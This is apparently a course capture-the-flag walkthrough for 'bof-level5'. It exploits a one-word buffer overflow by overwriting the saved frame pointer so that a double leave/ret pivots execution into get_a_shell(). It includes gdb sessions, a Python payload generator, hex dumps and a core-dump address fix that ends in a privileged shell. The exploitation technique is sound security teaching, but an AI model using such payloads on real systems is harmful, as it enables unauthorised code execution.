# CANDL: unit02/bof-level5 To check the positions of variables at the stack accurately, let's take a look at the disassembly of `receive_input()`. ``` kxj190011@ctf-vm1.utdallas.edu:/home/kxj190011/unit2/bof-level5 $ gdb bof-level5 $ gdb ./bof-level5 Reading symbols from bof-level5...(no debugging symbols found)...done. pwndbg> disassemble receive_input Dump of assembler code for function receive_input: 0x08048558 <+0>: push %ebp 0x08048559 <+1>: mov %esp,%ebp 0x0804855b <+3>: sub $0x88,%esp 0x08048561 <+9>: sub $0x4,%esp 0x08048564 <+12>: push $0x84 <-- 3rd arg, at 0x8(%esp) 0x08048569 <+17>: lea -0x80(%ebp),%eax <-- 2nd,-0x80(%ebp) 0x0804856c <+20>: push %eax <-- 2nd arg, at 0x4(%esp) 0x0804856d <+21>: push $0x0 <-- 1st arg, at (%esp) 0x0804856f <+23>: call 0x8048390 0x08048574 <+28>: add $0x10,%esp 0x08048577 <+31>: nop 0x08048578 <+32>: leave 0x08048579 <+33>: retl End of assembler dump. ``` Try `man read` to see the function signature of *read()* is, ``` NAME read - read from a file descriptor SYNOPSIS #include ssize_t read(int fd, void *buf, size_t count); -> read(0, %ebp-0x80, 0x84), ``` and from the assembly, the buffer is at %ebp-0x80. And we can write 132 (0x84) bytes. We can draw the stack as follows: ``` [ buffer - %ebp-0x80 ][saved ebp][ret addr] \__________128 bytes___________/\_4 bytes_/\_4bytes_/ \_______________132 bytes_______________/ ``` We can overwrite the saved %ebp but not the return address. So what we will do is, we will change the value of saved %ebp at `leave-retl` of `receive_input()`, and finally change the return address of `run()`, which is the caller of `receive_input()`, for its `leave-retl`. Before doing this, let's recap on leave and ret. ``` leave: mov %ebp, %esp <-- set %esp as the same value as %ebp pop %ebp <-- set %ebp as the value of (%esp), and add $4, %esp. ret: pop %eip <-- set the instruction pointer as the value of (%esp), and add $4, %esp. ``` And, if we execute `leave-retl` twice, * 1st round ``` leave: %esp = %ebp+4 %ebp = %saved_ebp ret: %eip = (%esp) ``` Now our %ebp is %saved_ebp, and `leave-retl` again. * 2nd round ``` leave: %esp = %ebp+4 = %saved_ebp+4 %ebp = (%ebp) = (%saved_ebp) ret-2: %eip = (%esp) = (%saved_ebp+4) ``` (Please refer to the slide W2L2 for the animation of the stack operation if you cannot follow the change of %ebp and %esp) So, at the 2nd return, the CPU will use the value at the address of %saved_ebp+4 as the return address (i.e., jump to the value of %saved_ebp+4). Let's do a simple math. (%saved_ebp + 4) = return address %saved_ebp + 4 = the address that stores return address %saved_ebp = the address that stores return address - 4 And we can overwrite %saved_ebp. So what we need to do at this stack: ``` [ buffer - %ebp-0x80 ][saved %ebp][ret_addr in run()] \__________128 bytes___________/\_4 bytes_/\______4bytes_____/ \_______________132 bytes_______________/ ``` Thus is to fill 128 bytes for the buffer, and fill the remaining 4 bytes of 132 bytes as [the address of return address] - 4. Then, where can we find the address of return address? Let's first check where do we want to return (the get_a_shell() function). ``` pwndbg$ info functions ... 0x0804850b get_a_shell ``` Yes, it is at 0x804850b. Then, would the value be 0x804850b-4 = 0x8048507? NOOOOOOOO. We need to know the address that stores 0x804850b. Is there any place in the program? No, definitely not. Then, where can we find the address? To find that easily, let's think about the memory that we can control. ``` [ buffer - %ebp-0x80 ][saved %ebp][ret_addr in run()] \__________128 bytes___________/\_4 bytes_/\______4bytes_____/ \_______________132 bytes_______________/ --- OUR INPUTS (CONTROLLABLE) HERE --- ```` In the stack, we can control the 132 bytes starting from the buffer. Although we must put some calculated value for the last 4 bytes (for %saved_ebp), we can freely set the first 128 bytes of our input. Then, let's get the address of our buffer. We can easily do this by setting a break point before the leave instruction in receive_input, and check the buffer's location by inspecting %ebp-0x80. 1. Open gdb and disassemble receive_input ``` pwndbg$ disas receive_input Dump of assembler code for function receive_input: 0x08048558 <+0>: push %ebp 0x08048559 <+1>: mov %esp,%ebp 0x0804855b <+3>: sub $0x88,%esp 0x08048561 <+9>: sub $0x4,%esp 0x08048564 <+12>: push $0x84 0x08048569 <+17>: lea -0x80(%ebp),%eax 0x0804856c <+20>: push %eax 0x0804856d <+21>: push $0x0 0x0804856f <+23>: call 0x8048390 0x08048574 <+28>: add $0x10,%esp 0x08048577 <+31>: nop 0x08048578 <+32>: leave <-- LEAVE at +32 0x08048579 <+33>: ret End of assembler dump. ``` 2. Set a break point at receive_input + 32 ``` pwndbg$ b *receive_input+32 Breakpoint 1 at 0x8048578 ``` 3. run ``` pwndbg$ r ``` In our tutorial example, I typed '1234' as the content of buffer. And let's check where the buffer is: ``` pwndbg$ x/x $ebp-0x80 0xffffd578: 0x34333231 ``` Yes, our buffer starts at the address 0xffffd578, and as we expect, the buffer contains 0x34333231, which is "1234". So if we set the saved_ebp as 0xffffd578, we can make CPU to use some values from our input to manage the stack (and we will change the return address by doing this!) Then, what values do you want to set? First, we need to set saved_ebp as the address of our buffer, 0xffffd578. ``` /--- pointed by %saved %ebp, e.g., 0xffffd578 v [xxx][RET][yyy][zzz][aaa]....[bbb]["\x78\xd5\xff\xff"][ret_addr in run()] \_____saved_ebp____/ little endian of 0xffffd578. ``` Then, we will fill the buffer as follows: ``` "xxxx" + "\x0b\x85\x04\x08" + "zzzz" * ((128/4)-2) + "\x78\xd5\xff\xff" new_ebp (return_address) others (to fill 128 bytes) (start_of_buffer) \__________________________128 bytes______________________/ \____saved_ebp____/ ``` Then at the 2nd return, the CPU will return to %saved_ebp+4, which is 0xffffd57c. Our buffer will look like this: ``` /--- pointed by %saved %ebp, e.g., 0xffffd578 | /------- 0xffffd57c, contains RET = 0x804850b = get_a_shell() v v [xxx][RET][yyy][zzz][aaa]....[bbb]["\x78\xd5\xff\xff"][ret_addr in run()] \_4_/\_4_/\_4_/\_4_/\_4_/....\_4_/\________4_________/ \_____________128______________/ / \___________________132_________________/ ``` and RET will be 0x804850b (address of get_a_shell()), in little endian: `\x0b\x85\x04\x08`. then the CPU will return to get_a_shell by the following steps: 1. Before the first leave at receive_input. ``` /----- pointed by %esp | /---- pointed by %ebp v v [argument area][xxx][RET][yyy][zzz][aaa]....[bbb]["\x78\xd5\xff\xff"][ret_addr in run()] ``` 2. After the first leave ``` /----- pointed by %esp /---- pointed by %ebp | v v [argument area][xxx][RET][yyy][zzz][aaa]....[bbb]["\x78\xd5\xff\xff"][ret_addr in run()] ^ | \--- address 0xffffd578 ``` 3. Return of the receive_input() (before 2nd leave in run()) ``` /----- pointed by %esp /---- pointed by %ebp | v v [argument area][xxx][RET][yyy][zzz][aaa]....[bbb]["\x78\xd5\xff\xff"][ret_addr in run()] ^ | \--- address 0xffffd578 ``` 4. 2nd leave in run() * %ebp now points to xxxx... ``` /----- pointed by %esp | v [argument area][xxx][RET][yyy][zzz][aaa]....[bbb]["\x78\xd5\xff\xff"][ret_addr in run()] ^ | \--- address 0xffffd578 ``` 5. return in run() * pop [RET], so runs the return address of our choice. ``` /----- pointed by %esp | v [argument area][xxx][RET][yyy][zzz][aaa]....[bbb]["\x78\xd5\xff\xff"][ret_addr in run()] ^ | \--- address 0xffffd578 ``` Then the CPU will run get_a_shell() pointed by RET! To make that input, let's create a python script. ```python= #!/usr/bin/env python with open('input.txt','wb') as f: f.write("xxxx" + "\x0b\x85\x04\x08" + "aaaa" * (128/4 - 2) + "\x78\xd5\xff\xff") ``` If you run the script, you will get input.txt as: ``` $ xxd input.txt 00000000: 7878 7878 0b85 0408 6161 6161 6161 6161 xxxx....aaaaaaaa 00000010: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa 00000020: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa 00000030: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa 00000040: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa 00000050: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa 00000060: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa 00000070: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa 00000080: 78d5 ffff x... ``` Let's run that in gdb, with a breakpoint at the first leave. ``` pwndbg$ b *receive_input +32 Note: breakpoint 1 also set at pc 0x8048578. Breakpoint 2 at 0x8048578 pwndbg$ r < input.txt ``` Let's do 'ni', After the first leave, you can observe: ``` EBP: 0xffffd578 --> ("xxxx\v\205\004\b", 'a' , (seems buffer) ESP: 0xffffd5fc --> 0x80485b5 (: nop) ``` Let's do three 'ni's again, until we execute 2nd leave in the run() Now, ``` EBP: 0x78787878 ('xxxx') ESP: 0xffffd57c --> 0x804850b (: push %ebp) ``` ESP is pointing an address that contains the start of get_a_shell(), so if we execute 'ret', then it will run get_a_shell()! press 'c' to continue! ``` pwndbg$ c Continuing. Spawning a privileged shell process 7252 is executing new program: /bin/bash Error in re-setting breakpoint 1: No symbol "receive_input" in current context. Error in re-setting breakpoint 2: No symbol "receive_input" in current context. Error in re-setting breakpoint 1: No symbol "receive_input" in current context. Error in re-setting breakpoint 2: No symbol "receive_input" in current context. Error in re-setting breakpoint 1: No symbol "receive_input" in current context. Error in re-setting breakpoint 2: No symbol "receive_input" in current context. [Inferior 1 (process 7252) exited normally] ``` Yes, we can execute the shell... Then let's try the following command (and also press few enter keys): ``` $ (cat input.txt; cat) | ./bof-level5 ``` Now we have a buffer overflow vulnerability, but the vulnerability cannot reach to the return address... Can you exploit this program? Segmentation fault (core dumped) Un oh, our exploit does not work. Why? It's because the environment in gdb differs from the actual environment of running of a program outside gdb. We need to match that difference, and the difference can easily be observed in the core file, which is generated by that "(core dumped)" message. A core file contains a snapshot of memory space of a program when the program crashes. So we can find an exact address of our environment by inspecting the core file. Let's open the core file using 'gdb'. $ gdb --core=core [New LWP 7261] warning: Unexpected size of section `.reg-xstate/7261' in core file. Core was generated by `./bof-level5'. Program terminated with signal SIGSEGV, Segmentation fault. warning: Unexpected size of section `.reg-xstate/7261' in core file. #0 0x61616161 in ?? () It seems that the program got a fault at the address 0x61616161, and 0x61616161 is "aaaa", which seems some of our input (we put "xxxx" + "get_a_shell()" + ) Let's check our stack. ``` pwndbg$ x/100xw $esp 0xffffd580: 0x61616161 0x61616161 0x61616161 0x61616161 0xffffd590: 0x61616161 0x61616161 0x61616161 0x61616161 0xffffd5a0: 0x61616161 0x61616161 0x61616161 0x61616161 0xffffd5b0: 0x61616161 0x61616161 0x61616161 0x61616161 0xffffd5c0: 0x61616161 0x61616161 0xffffd578 0x080485b5 <-- 0xffffd578 is the address that we typed 0xffffd5d0: 0x00000001 0xffffd694 0xffffd5e8 0x080485ce 0xffffd5e0: 0xf7fb43dc 0xffffd600 0x00000000 0xf7e1a637 0xffffd5f0: 0xf7fb4000 0xf7fb4000 0x00000000 0xf7e1a637 0xffffd600: 0x00000001 0xffffd694 0xffffd69c 0x00000000 0xffffd610: 0x00000000 0x00000000 0xf7fb4000 0xf7ffdc04 0xffffd620: 0xf7ffd000 0x00000000 0xf7fb4000 0xf7fb4000 0xffffd630: 0x00000000 0xdecab371 0xe22d5d61 0x00000000 0xffffd640: 0x00000000 0x00000000 0x00000001 0x08048410 0xffffd650: 0x00000000 0xf7fee010 0xf7fe8880 0xf7ffd000 0xffffd660: 0x00000001 0x08048410 0x00000000 0x08048431 0xffffd670: 0x080485b8 0x00000001 0xffffd694 0x080485e0 0xffffd680: 0x08048640 0xf7fe8880 0xffffd68c 0xf7ffd918 0xffffd690: 0x00000001 0xffffd7c8 0x00000000 0xffffd7d5 0xffffd6a0: 0xffffd7e5 0xffffd7f0 0xffffd7fb 0xffffd80e 0xffffd6b0: 0xffffd81b 0xffffdda3 0xffffddb6 0xffffddc4 0xffffd6c0: 0xffffddd2 0xffffdde9 0xffffde5f 0xffffde88 0xffffd6d0: 0xffffde99 0xffffdf06 0xffffdf0e 0xffffdf2b 0xffffd6e0: 0xffffdf44 0xffffdf54 0xffffdf74 0xffffdf82 0xffffd6f0: 0xffffdf99 0xffffdfbb 0xffffdfca 0x00000000 0xffffd700: 0x00000020 0xf7fd7fe0 0x00000021 0xf7fd7000 ``` Right now, our focus is to find the start address of the buffer. Because we cannot see the starting point ("xxxx", which is 0x78787878), let's move the printing index further below, say $esp-0x100. ``` pwndbg$ x/100xw $esp-0x100 0xffffd480: 0xffffd540 0xf7fe2b4b 0x0804820c 0xffffd4f8 0xffffd490: 0xf7ffda74 0x00000001 0xf7fd34a0 0x00000001 0xffffd4a0: 0xf7fe2a70 0x080481dc 0x00000001 0xf7ffd918 0xffffd4b0: 0x0804a00c 0xf7fe78a2 0xf7ffdad0 0xf7fd34a0 0xffffd4c0: 0x00000001 0x00000001 0x00000000 0xf7e6b0b1 0xffffd4d0: 0x00000001 0x0804b008 0x0000001e 0x08048295 0xffffd4e0: 0xf7ffd000 0x0804826c 0xf7e0edc8 0xf7fb4d60 0xffffd4f0: 0x0000000a 0xf7e09b08 0xffffd5b8 0xf7e6a3e4 0xffffd500: 0xf7fe77eb 0x00000000 0xf7fb4000 0xf7fb4000 0xffffd510: 0xffffd5c8 0xf7fee010 0xffffd5c8 0x00000084 0xffffd520: 0xffffd548 0xf7ed7b23 0x00000000 0x08048574 0xffffd530: 0x00000000 0xffffd548 0x00000084 0xf7e6c47b 0xffffd540: 0xf7fb4d60 0x0804b008 0x78787878 0x0804850b <-- here is our buffer! 0x78787878!!! 0xffffd550: 0x61616161 0x61616161 0x61616161 0x61616161 0xffffd560: 0x61616161 0x61616161 0x61616161 0x61616161 0xffffd570: 0x61616161 0x61616161 0x61616161 0x61616161 0xffffd580: 0x61616161 0x61616161 0x61616161 0x61616161 0xffffd590: 0x61616161 0x61616161 0x61616161 0x61616161 0xffffd5a0: 0x61616161 0x61616161 0x61616161 0x61616161 0xffffd5b0: 0x61616161 0x61616161 0x61616161 0x61616161 0xffffd5c0: 0x61616161 0x61616161 0xffffd578 0x080485b5 0xffffd5d0: 0x00000001 0xffffd694 0xffffd5e8 0x080485ce 0xffffd5e0: 0xf7fb43dc 0xffffd600 0x00000000 0xf7e1a637 0xffffd5f0: 0xf7fb4000 0xf7fb4000 0x00000000 0xf7e1a637 0xffffd600: 0x00000001 0xffffd694 0xffffd69c 0x00000000 ``` See the line below: ``` 0xffffd540: 0xf7fb4d60 0x0804b008 0x78787878 0x0804850b <-- here is our buffer! 0x78787878!!! ``` Our buffer starts (0x78787878) in the middle of line, so we can infer the address is 0xffffd540 + 8 (two integers between the start and 0x78787878), so it is 0xffffd548. Let's adjust our address in the script then. ```python #!/usr/bin/env python with open('input.txt','wb') as f: f.write("xxxx" + "\x0b\x85\x04\x08" + "aaaa" * (128/4 - 2) + "\x48\xd5\xff\xff") ``` and running this script and print input.txt: ``` red9057@blue9057-vm-ctf1 : ~/unit2/bof-level5 $ xxd input.txt 00000000: 7878 7878 0b85 0408 6161 6161 6161 6161 xxxx....aaaaaaaa 00000010: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa 00000020: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa 00000030: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa 00000040: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa 00000050: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa 00000060: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa 00000070: 6161 6161 6161 6161 6161 6161 6161 6161 aaaaaaaaaaaaaaaa 00000080: 48d5 ffff ``` Yes, now the saved %ebp points to 0xffffd548. And you can get the flag by running the following commands: ``` red9057@blue9057-vm-ctf1 : ~/unit2/bof-level5 $ (cat input.txt;cat) | ./bof-level5 Now we have a buffer overflow vulnerability, hbut the vulnerability cannot reach to the return address... Can you exploit this program? Spawning a privileged shell $ id uid=1006(red9057) gid=50205(unit2-level5-ok) groups=50205(unit2-level5-ok),1006(red9057) $ cat flag candl{???SCRAMBLED???} ```